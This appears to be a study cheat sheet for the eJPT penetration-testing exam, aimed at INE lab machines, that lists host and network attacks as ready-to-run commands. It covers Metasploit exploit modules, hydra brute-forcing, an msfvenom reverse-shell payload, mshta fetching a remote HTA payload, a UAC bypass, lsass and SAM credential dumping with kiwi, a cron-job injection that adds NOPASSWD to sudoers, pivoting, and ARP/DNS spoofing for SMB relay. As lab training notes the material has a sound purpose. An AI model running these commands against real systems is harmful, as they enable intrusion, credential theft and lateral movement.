Network Pentest

System/Host Based Attacks

  • webdav metasploit
    • use dirb to find the dav directory dirb demo.ine.local
    • use davtest tool davtest -url http://demo.ine.local/webdav
    • login with davtest davtest -auth bob:password_123321 -url http://demo.ine.local/webdav
    • msf module iis_webdav_upload_asp, set RHOSTS, HttpUsername, HttpPassword and PATH /webdav/metasploit%RAND%.asp
  • smb server psexec
    • msf module to bruteforce auxiliary/scanner/smb/smb_login, set USER_FILE PASS_FILE RHOSTS and VERBOSE
    • msf module to gain access exploit/windows/smb/psexec, set RHOSTS SMBUser and SMBPass
  • insecure rdp service
    • use msf module auxiliary/scanner/rdp/rdp_scanner to detect rdp service
    • use hydra bruteforce hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://demo.ine.local -s 3333
    • connect with xfreerdp xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333
  • winrm exploitation with msf
    • msf module to bruteforce auxiliary/scanner/winrm/winrm_login, set RHOSTS USER_FILE PASS_FILE VERBOSE and PASSWORD anything
    • msf module to check auth methods auxiliary/scanner/winrm/winrm_auth_methods
    • msf module to execute shellcode auxiliary/scanner/winrm/winrm_cmd
    • msf module to get meterpreter session exploit/windows/winrm/winrm_script_exec, set FORCE_VBS true
  • uac bypass with uacme
    • HTTP File Server (HFS) is an example
    • use searchsploit searchsploit hfs
    • msf module exploit/windows/http/rejetto_hfs_exec
    • common meterpreter getuid sysinfo, migrate to privileged process like ps -S explorer.exe migrate 2332 and getsystem
    • check admin privilege shell net localgroup administrators but its admin without high privilege
    • to get high privilege, upload backdoor.exe from msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.31.2 LPORT=4444 -f exe > 'backdoor.exe' and Akagi64.exe from UACMe
    • create a PAYLOAD windows/meterpreter/reverse_tcp with msf module exploit/multi/handler and connect back with Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
    • now we have high privilege, migrate to lssas.exe using ps -S lsass.exe migrate 496 and dump hashes with hashdump
  • privilege escalation using token impersonation
    • exploit hsf server with exploit/windows/http/rejetto_hfs_exec msf module
    • load the incog plugin load incognito and check tokens list_tokens -u
    • impersonate token with impersonate_token ATTACKDEFENSE\\Administrator
  • unattended installation
    • use the PowerSploit framework and Powerup.ps1 scripts powershell -ep bypass (PowerShell execution policy bypass) . .\PowerUp.ps1 Invoke-PrivescAudit
    • there is an Unattend.xml at cat C:\Windows\Panther\Unattend.xml, decode with base64
    • using runas runas.exe /user:administrator cmd and the password to login
    • to get meterpreter use msf module exploit/windows/misc/hta_server and get the url, then run mshta.exe http://10.10.31.2:8080/Bn75U0NL8ONS.hta on windows
  • kiwi extension
    • exploit badblue 2.7 exploit/windows/http/badblue_passthru, migrate migrate -N lsass.exe, load kiwi load kiwi
    • dump admin NTLM creds_all, extract users lsa_dump_sam and get syskey lsa_dump_secrets
  • proftp recon
    • hydra bruteforce hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local -t 4 ftp
    • nmap bruteforce nmap --script ftp-brute --script-args userdb=/root/users -p 21 demo.ine.local
  • samba recon
    • msf module bruteforce auxiliary/scanner/smb/smb_login set PASS_FILE and SMBUser
    • using hydra hydra -l admin -P /usr/share/wordlists/rockyou.txt demo.ine.local smb
    • using smbmap smbmap -H demo.ine.local -u admin -p password1
    • list the shares smbclient -L demo.ine.local -U jane
    • check if it exists but not browsable smbclient //demo.ine.local/jane -U jane, connect to smb smbclient //demo.ine.local/admin -U admin
    • list the named pipes using msf module auxiliary/scanner/smb/pipe_auditor, they faciliate IPC connection using IPC$ share
    • use enum4linux to get SID enum4linux -r -u "admin" -p "password1" demo.ine.local
  • cronjobs
    • add user to sudoers by injecting script executed by root cronjob printf '#! /bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh then sudo -l sudo su into root shell
  • exploiting suid
    • welcome file has suid bit, just run it to get root bruh
  • cracking linux password
    • exploit proftp exploit/unix/ftp/proftpd_133c_backdoor PAYLOAD payload/cmd/unix/reverse
    • post exploitation module to dump hashes post/linux/gather/hashdump set SESSION 1
    • crack hash use auxiliary/analyze/crack_linux set SHA512 true

Network-Based Attacks

  • netbios hacking
    • get the security level nmap -p445 --script smb-security-mode demo.ine.local
    • check for anonymous access smbclient -L demo.ine.local
    • enumerate users with nmap nmap -p445 --script smb-enum-users.nse demo.ine.local
    • using hydra with the list of users hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
    • getting meterpreter with credentials msf module exploit/windows/smb/psexec
    • pivot by adding route run autoroute -s 10.0.22.69/20
    • start a socks proxy, check the port cat /etc/proxychains4.conf and use msf module use auxiliary/server/socks_proxy and set SRVPORT 9050 VERSION 4a
    • nmap over socket connection proxychains nmap demo1.ine.local -sT -Pn -sV -p 445
    • migrate to migrate -N explorer.exe and use net view 10.0.22.69 list shares on internal device
    • map the shares to drive net use D: \\10.0.22.69\Documents
  • snmp analysis
    • snmp nmap bruteforce nmap -sU -p 161 --script=snmp-brute demo.ine.local to get community string
    • get information on community string using snmpwalk -v 1 -c public demo.ine.local
    • nmap get all info on snmp nmap -sU -p 161 --script snmp-* demo.ine.local > snmp_output
    • using list of users, we can bruteforce smb using hydra hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
    • login to smb using msf module exploit/windows/smb/psexec
  • dns and smb relay attack
    • setup the relay using msf module exploit/windows/smb/smb_relay
    • configure dnsspoof echo "172.16.5.101 *.sportsfoo.com" > dns dnsspoof -i eth1 -f dns
    • enable port forwarding echo 1 > /proc/sys/net/ipv4/ip_forward
    • start arp spoof for both sides arpspoof -i eth1 -t 172.16.5.5 172.16.5.1 arpspoof -i eth1 -t 172.16.5.1 172.16.5.5
    • once it receives the connection, you get a meterpreter shell
ejpt

Written By

GitHub Contributor Team